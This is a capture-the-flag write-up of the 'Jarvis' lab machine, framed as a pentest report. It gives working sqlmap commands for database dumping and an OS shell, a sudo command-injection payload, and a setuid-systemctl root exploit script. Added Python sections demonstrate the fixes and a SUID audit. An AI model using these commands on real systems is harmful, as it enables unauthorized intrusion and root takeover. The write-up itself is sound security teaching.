Jarvis CTF Writeup
Jarvis is a medium-difficulty Linux machine featuring a web server with an SQL injection vulnerability; exploiting it yields initial access. Privilege escalation involves executing a script as another user and then abusing the SUID bit set on systemctl to gain root.
Executive Summary
This report documents the findings of a penetration test conducted against the Jarvis CTF's web server, identified by the virtual host supersecurehotel.htb and the IP address 10.10.10.143. The test revealed multiple vulnerabilities, ranging from SQL Injection to Vertical Privilege Escalation, which pose significant security risks to the system. Immediate action is recommended to mitigate these vulnerabilities and enhance the security posture of the system.
Introduction
The penetration test aimed to identify and exploit vulnerabilities within the system to assess its security. The primary focus was on the web server running at 10.10.10.143, which hosts the supersecurehotel.htb site. This report provides an overview of the methodologies used, a detailed description of the vulnerabilities discovered, and recommended mitigations.
Methodology
The penetration test followed a structured approach, beginning with service enumeration to identify open ports and services. The identified services were then subjected to various attack techniques to uncover vulnerabilities. The process involved automated tools as well as manual testing to ensure comprehensive coverage.
Findings and Recommendations
Overview of Vulnerabilities
The test uncovered four vulnerabilities, detailed below. Each finding carries a severity rating indicating its potential impact on the system.
BS01: SQL Injection
- Severity: Elevated
- Impact: Allows unauthorized access to potentially sensitive information from the database.
- Recommendation: Implement input validation and prepared statements to mitigate this vulnerability. It's crucial to apply a whitelist approach for input validation and to ensure that queries are safely executed.
BS02: Remote Code Execution
- Severity: High
- Impact: Permits remote attackers to execute arbitrary code on the system.
- Recommendation: Addressing the SQL Injection vulnerability (BS01) will also mitigate this issue. Additionally, ensure that the web application runs with the least privileges required, reducing the potential impact of such vulnerabilities.
BS03: Horizontal Privilege Escalation
- Severity: High
- Impact: Allows attackers to escalate privileges horizontally, gaining access as other users.
- Recommendation: Review and restrict the use of sudo privileges for scripts and ensure that scripts executed with elevated privileges do not contain vulnerabilities that could be exploited for command injection.
BS04: Vertical Privilege Escalation
- Severity: Extreme
- Impact: Enables attackers to escalate privileges from a lower-privileged user to root.
- Recommendation: Remove unnecessary SUID bits from binaries that do not require them, especially those that can execute shell commands. Regularly audit permissions and SUID bits to ensure they are only assigned where absolutely necessary.
Additional Insights
Emerging Threats and Trends
The cybersecurity landscape is continuously evolving, with new threats emerging regularly. The vulnerabilities identified in this report—SQL Injection, Remote Code Execution, Horizontal, and Vertical Privilege Escalation—are not new but remain highly effective in the attacker's arsenal due to common oversights in security practices. Recent trends show an increase in sophisticated, targeted attacks exploiting such vulnerabilities, often as entry points for more extensive breach campaigns. Organizations should stay informed about the latest threat intelligence and adapt their security strategies accordingly.
Security Best Practices
To enhance the security posture and mitigate the risk of exploitation, organizations should adopt a layered security approach. This includes not only technical measures but also administrative and physical security controls. Key best practices include the principle of least privilege, regular security audits and assessments, security awareness training, and incident response planning.
Initial Target - 10.10.10.143
Virtual Host: supersecurehotel.htb
Service Enumeration
Objective: Identify open ports and services to determine potential attack vectors.
Findings:
| IP Address | Ports Open |
|---|---|
| 10.10.10.143 | TCP: 22 (SSH), 80 (HTTP), 64999 (Custom Service) |
Analysis: SSH and HTTP indicate standard remote management and web server functionality, respectively. The custom service on port 64999 is a less conventional entry point and warrants further investigation. Given its accessibility and the broad attack surface web applications typically present, the web server was chosen as the initial focus for vulnerability exploitation.
Target: Web Server (port 80/tcp)
BS01: SQL Injection
- Vulnerability Explanation: An SQL injection flaw was discovered in supersecurehotel.htb/room.php, affecting the `cod` parameter. The parameter is placed into a database query without validation, so an attacker can inject SQL of their own and read or manipulate data the page was never meant to expose.
- Severity: Elevated
- Recommendation: Validate the parameter against a whitelist of expected values (here, a small positive integer) and pass it to the database through a parameterized query or prepared statement, so that user input can never change the structure of the query.
- Steps to Reproduce:
  - Use sqlmap, a tool that automates the detection and exploitation of SQL injection flaws.
  - Execute the following command (the URL is quoted so the shell does not interpret the `?`):

```bash
sqlmap -u 'http://supersecurehotel.htb/room.php?cod=2' -p cod -D hotel -T room --delay=3 --dump
```

- Technical Insight: Although the hotel database currently holds no sensitive information, the vulnerability still represents a significant future risk. Exploitation is simple and needs no advanced technical knowledge, which raises its severity.
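The mechanism behind BS01 and its fix, as an added example that is not code from the original page or from the Jarvis application: a Python stand-in for the room lookup, backed by an in-memory SQLite database. The table layout, the row values and the second `users` table are constructed (the real application is PHP on MySQL and its schema is not shown on the page); since the page states the hotel database currently holds nothing sensitive, the `users` table stands for the kind of data such a database might hold later. The vulnerable lookup splices `cod` into the SQL text, so the boolean probes that `sqlmap --technique=B` sends produce different results and a UNION payload reads the other table; the hardened lookup whitelists the value's shape and binds it as a parameter, so the same payloads are refused.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the "hotel" database. Column names and rows are
    # assumptions; the real schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO room VALUES (1, 'Superior Family', 200);
        INSERT INTO room VALUES (2, 'Suite', 300);
        INSERT INTO room VALUES (3, 'Double', 180);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'DBadmin', 'hunter2');
    """)
    return db


def room_vulnerable(db, cod):
    # Vulnerable pattern: the request parameter is spliced into the SQL text,
    # so the caller controls the query's structure, not just a value.
    sql = f"SELECT cod, name, price FROM room WHERE cod = {cod}"
    return db.execute(sql).fetchall()


# Whitelist: the room code is a small positive integer and nothing else.
COD_RE = re.compile(r"[0-9]{1,6}")


def room_safe(db, cod):
    # Hardened pattern: check the input against the whitelist, then bind it
    # as a parameter. The driver sends the value separately from the SQL
    # text, so it can never change the query's structure.
    if not COD_RE.fullmatch(str(cod)):
        raise ValueError("cod must be a small positive integer")
    sql = "SELECT cod, name, price FROM room WHERE cod = ?"
    return db.execute(sql, (int(cod),)).fetchall()


def safe_rejects(db, cod):
    # True when the hardened lookup refuses the payload.
    try:
        room_safe(db, cod)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    benign = "2"
    true_probe = "2 AND 1=1"     # boolean-based blind probes, as sqlmap sends
    false_probe = "2 AND 1=2"
    union = "2 UNION SELECT id, username, password FROM users"
    print(room_vulnerable(db, benign))       # the Suite row
    print(room_vulnerable(db, true_probe))   # same row: condition is true
    print(room_vulnerable(db, false_probe))  # no rows: the page differs
    print(room_vulnerable(db, union))        # Suite row plus the users row
    for payload in (true_probe, union):
        print(payload, "rejected:", safe_rejects(db, payload))
    print(room_safe(db, benign))
```

The differing result for `2 AND 1=1` versus `2 AND 1=2` is the signal a boolean-based blind test keys on; the UNION row shows why a parameter that only selects a room can still expose every other table the database account can read.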
BS02: Remote Code Execution (RCE)
- Vulnerability Explanation: The SQL injection described in BS01 can be extended to arbitrary code execution on the server as the www-data user. That level of access lets an attacker take control of the web server, which is a severe security risk.
- Severity: High
- Recommendation: Fixing the SQL injection (BS01) closes the path to RCE. In addition, revoke the MySQL FILE privilege from the application's database account and make sure the document root is not writable by the database service (and that secure_file_priv does not permit writes there): sqlmap's `--os-shell` obtains execution by writing a web stager into the directory given by `--web-root` using `SELECT ... INTO OUTFILE`, which only works when the database account holds that privilege and the target directory is writable by it. Also limit the web server's own privileges and audit regularly for unnecessary services or applications that enlarge the attack surface.
- Steps to Reproduce:
  - With the injection point confirmed, use sqlmap to obtain a shell on the server.
  - Execute the following command:

```bash
sqlmap -u 'http://supersecurehotel.htb/room.php?cod=2' -p cod --delay=2 --dbms=mysql --os-shell --web-root=/var/www/html --random-agent --skip-waf --batch --technique=B
```
Post-Exploitation
BS03: Horizontal Privilege Escalation
- Vulnerability Explanation: The www-data user is allowed by sudo to run a Python script (`simpler.py`) as the user pepper. The script hands user-supplied input to a shell without adequate filtering, which permits command injection and a move to the pepper account.
- Severity: High
- Recommendation: Audit and restrict sudo permissions, especially for scripts and binaries. Any script that runs with elevated privileges must be vetted for command injection; in particular, avoid passing user input to a shell at all, and validate it against an allowlist of expected values rather than a blacklist of characters.
- Steps to Reproduce:
  - Confirm the permission with `sudo -l` as www-data, then create a malicious script at /var/www/html/evil.sh:

```bash
#!/bin/bash
# Copy bash into the web root and mark it setuid/setgid. When pepper runs
# this through simpler.py, the copy is owned by pepper, so anyone able to
# execute it obtains pepper's effective uid.
cp /bin/bash /var/www/html/
chmod +s /var/www/html/bash
```

  - Run:

```bash
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
```

  - At the script's prompt, inject a command substitution so that the script executes evil.sh as pepper: type `$(bash /var/www/html/evil.sh)` and press enter.
  - Execute `/var/www/html/bash -p` to obtain a shell as pepper (the `-p` flag stops bash from dropping the setuid effective uid).
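The filter bypass behind BS03, as an added example that is neither the page's code nor `simpler.py` itself: the page does not reproduce the script's input filter, so the character blacklist below is a constructed stand-in, and `echo` stands in for the script's ping command so the example runs offline. The vulnerable builder concatenates the checked string into a shell command line (the `os.system()` style), so a `$( )` substitution, which the blacklist does not cover, is expanded by the shell; the hardened builder parses the value as an IP address (an allowlist) and passes it as its own argv element with no shell involved.

```python
import ipaddress
import subprocess

# Constructed stand-in for a blacklist-style filter in a "ping this host"
# helper. This list is an assumption for the example; simpler.py's real
# filter is not shown on the page.
BLACKLIST = ("&", ";", "-", "`", "||", "|")


def blacklist_ok(user_input):
    # True when none of the forbidden substrings occur in the input.
    return not any(bad in user_input for bad in BLACKLIST)


def run_vulnerable(user_input, prog="echo"):
    # Vulnerable pattern: after the blacklist check the string is still glued
    # into a command line and handed to /bin/sh, so any construct the
    # blacklist misses, such as $( ), is expanded by the shell.
    # "echo" stands in for "ping -c 1" so this runs anywhere.
    if not blacklist_ok(user_input):
        return "forbidden character"
    line = f"{prog} {user_input}"
    res = subprocess.run(line, shell=True, capture_output=True, text=True)
    return res.stdout.strip()


def run_safe(user_input, prog="echo"):
    # Hardened pattern: allowlist the value by parsing it as an IP address,
    # then pass it as a separate argv element. No shell is involved, so shell
    # metacharacters are never interpreted.
    try:
        target = str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return "rejected: not an IP address"
    res = subprocess.run([prog, target], capture_output=True, text=True)
    return res.stdout.strip()


if __name__ == "__main__":
    payload = "$(bash /var/www/html/evil.sh)"      # the writeup's payload
    print("blacklist passes payload:", blacklist_ok(payload))
    print(run_vulnerable("127.0.0.1"))             # 127.0.0.1
    print(run_vulnerable("127.0.0.1; id"))         # forbidden character
    print(run_vulnerable("$(printf INJECTED)"))    # INJECTED: the shell ran it
    print(run_safe("127.0.0.1"))                   # 127.0.0.1
    print(run_safe("$(printf INJECTED)"))          # rejected
```

The `$(printf INJECTED)` input is a harmless substitute for the writeup's `$(bash /var/www/html/evil.sh)`: both pass the blacklist, and whatever is inside the parentheses runs with the privileges of the script, here pepper's.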
BS04: Vertical Privilege Escalation
- Vulnerability Explanation: The /bin/systemctl binary carries the SUID bit, so a user who can execute it, such as pepper, can have systemd start a unit of their choosing as root and escalate to a root shell. Binaries in this state can be enumerated with `find / -perm -4000 -type f 2>/dev/null`.
- Severity: Extreme
- Recommendation: Conduct a thorough audit of all binaries with the SUID bit set and confirm each one needs it for its intended purpose. Remove the SUID bit from binaries that do not require it to prevent unauthorized privilege escalation.
- Steps to Reproduce:
  - The script below shows how the SUID bit on systemctl is abused to gain root: a temporary service unit is written whose ExecStart sets the SUID bit on /bin/bash, systemctl links and starts it as root, and `bash -p` then runs with an effective uid of root. It underlines why strict permissions on sensitive binaries matter.

File: exploit.sh

```bash
#!/bin/bash
# Abuse a setuid-root systemctl: write a throwaway unit whose ExecStart marks
# /bin/bash setuid, link and start it (systemd runs it as root), then spawn
# bash with -p so the elevated effective uid is kept.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF          # link needs an absolute path; mktemp gives one
/bin/systemctl enable --now $TF  # enable the unit and start it immediately
/bin/bash -p
```
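An audit for the condition BS04 describes, as an added example that is not part of the original page: a Python check that lists setuid/setgid files absent from a baseline. The baseline set is an assumption for the example; a real one is taken from a known-good build of the same image, never from the host under review. Run against the host after the steps above, it would flag /bin/systemctl and also the two artifacts the exploitation leaves behind: the pepper-owned copy of bash under /var/www/html from BS03 and the setuid /bin/bash produced by exploit.sh.

```python
import os
import stat

# Assumed baseline of setuid/setgid binaries expected on the host.
BASELINE = {
    "/bin/mount", "/bin/su", "/bin/umount", "/usr/bin/chfn", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/sudo",
}


def is_privileged_bit(mode):
    # True for regular files carrying the setuid or setgid bit (what
    # "chmod +s" sets and what "find / -perm -4000" looks for).
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def classify(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode, st_uid) tuples.

    Returns (path, owner uid) for privileged files not in the baseline,
    root-owned ones first (those yield root directly), then by path.
    """
    unexpected = [(path, uid) for path, mode, uid in entries
                  if is_privileged_bit(mode) and path not in baseline]
    return sorted(unexpected, key=lambda e: (e[1] != 0, e[0]))


def walk(root="/"):
    # Collect (path, mode, uid) for every file, skipping pseudo-filesystems
    # and never following symlinks (lstat), so a link cannot spoof a result.
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev", "/run")):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            entries.append((path, st.st_mode, st.st_uid))
    return entries


if __name__ == "__main__":
    for path, uid in classify(walk()):
        print(f"unexpected setuid/setgid: {path} (owner uid {uid})")
```

Root-owned findings are the ones to act on first; a setuid file owned by an unprivileged account, like the pepper-owned bash copy, is still worth removing because it is exactly the foothold BS03 used.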
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!